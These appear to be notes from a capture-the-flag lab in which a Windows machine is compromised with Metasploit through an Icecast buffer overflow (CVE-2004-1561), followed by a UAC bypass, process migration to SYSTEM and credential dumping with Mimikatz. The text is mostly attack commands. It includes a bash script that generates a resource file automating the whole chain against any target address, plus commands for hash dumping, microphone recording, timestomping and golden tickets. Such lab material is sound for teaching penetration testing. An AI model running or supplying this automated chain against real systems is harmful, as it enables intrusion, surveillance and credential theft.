Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
scan the machine
nmap -sS -sV -sC -T4 10.10.97.40
wow, a vulnerable machine with a lot of open ports
nmap's script output also reports SMB on the host
search for vulnerabilities in its services, starting with the Icecast media server nmap identified
msfconsole
search icecast
we find a remote code execution via a header buffer overflow in Icecast,
CVE-2004-1561
use 0
info
show options
set RHOSTS 10.10.97.40
set LHOST 10.18.37.45
exploit
we gained access; let's look around
getuid
sysinfo
metasploit provides a module that automatically checks for potential privilege escalation exploits based on the system we are on
run post/multi/recon/local_exploit_suggester
it suggests a UAC bypass; background the current session before using it
Ctrl + Z (or the background command)
use exploit/windows/local/bypassuac_eventvwr
show options
set session 1
set LHOST 10.18.37.45
exploit
check our permissions
getprivs
we already hold a lot of privileges, including SeTakeOwnershipPrivilege (take ownership of files)
even though the token now carries these privileges, our current process is still running as the user Icecast was started as, not as SYSTEM, so list the processes and look for one owned by NT AUTHORITY\SYSTEM
ps
now we want to migrate into one of them, for example spoolsv.exe,
which is owned by 'NT AUTHORITY\SYSTEM'
migrate -N spoolsv.exe   (or migrate 1376, using the PID that ps showed for spoolsv.exe)
getuid
now we are 'NT AUTHORITY\SYSTEM', which has full control of the machine
using Mimikatz to retrieve all the credentials
load kiwi
creds_all
there you go!
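The whole chain above (Icecast exploit, UAC bypass, migration into spoolsv.exe, kiwi credential dump) can be driven from one Metasploit resource script instead of typing each command by hand. The following bash wrapper is an added example and not part of the original walkthrough: it generates the resource script for a given RHOST/LHOST pair and hands it to msfconsole -q -r. It assumes msfconsole is on PATH, that the Icecast session is created as session 1 and the UAC-bypass session as session 2 (check with sessions -l and adjust if your IDs differ), and that the sleep values give the payloads enough time to call back.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): automate the Ice walkthrough with
# a Metasploit resource script.  Session IDs 1 and 2 are assumptions.
set -eu

# build_rc RHOST LHOST  -> prints a Metasploit resource script to stdout
build_rc() {
  rhost="$1"
  lhost="$2"
  cat <<EOF
# 1. Icecast header overflow (CVE-2004-1561) -> session 1 (assumed ID)
use exploit/windows/http/icecast_header
set RHOSTS $rhost
set LHOST $lhost
exploit -j -z
sleep 15
sessions -l
# 2. see what the suggester recommends, then bypass UAC -> session 2 (assumed ID)
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST $lhost
exploit -j -z
sleep 15
# 3. migrate into a SYSTEM-owned process and dump credentials with kiwi
sessions -i 2 -C getuid
sessions -i 2 -C "migrate -N spoolsv.exe"
sessions -i 2 -C getuid
sessions -i 2 -C "load kiwi"
sessions -i 2 -C creds_all
EOF
}

# run RHOST LHOST -> write the script to a temp file and launch msfconsole on it
run_chain() {
  rc="$(mktemp)"
  build_rc "$1" "$2" > "$rc"
  echo "resource script written to $rc"
  msfconsole -q -r "$rc"
}

# Invoke as:  ./ice.sh run 10.10.97.40 10.18.37.45
case "${1:-}" in
  run) run_chain "${2:-10.10.97.40}" "${3:-10.18.37.45}" ;;
esac
```

Running the script with no arguments only defines the functions, so you can source it and call build_rc to inspect the generated resource script before pointing it at a target; sessions -C runs a single Meterpreter command on the given session, which is what lets the migrate and kiwi steps be scripted without an interactive prompt.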
this section hones your meterpreter and Mimikatz skills
have a look at the built-in documentation by typing:
help
What command allows us to dump all of the password hashes stored on the system? We won't crack the Administrator password in this case as it's pretty strong (this is intentional, to discourage password-spraying attempts)
hashdump
While more useful on a machine that is actively being used, what command allows us to watch the remote user's desktop in real time?
screenshare
How about if we wanted to record from a microphone attached to the system?
record_mic
To complicate forensic efforts we can modify the timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! It is not beneficial to the defending team as they try to reconstruct the events of the pentest after the fact. Note for defenders: this technique only rewrites the timestamps in the NTFS $STANDARD_INFORMATION attribute; the $FILE_NAME attribute keeps its own set, so a mismatch between the two is a common indicator that a file was timestomped.
timestomp
Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
golden_ticket_create
As we have the password for the user 'Dark' (recovered by creds_all above), we can now authenticate to the machine and access it via remote desktop (RDP). As this is a workstation, we'd likely kick off whatever user is signed onto it when we connect; however, it's always interesting to remote into machines and view them as their users do.
If RDP hasn't already been enabled, we can enable it from the SYSTEM session via the following Metasploit module:
run post/windows/manage/enable_rdp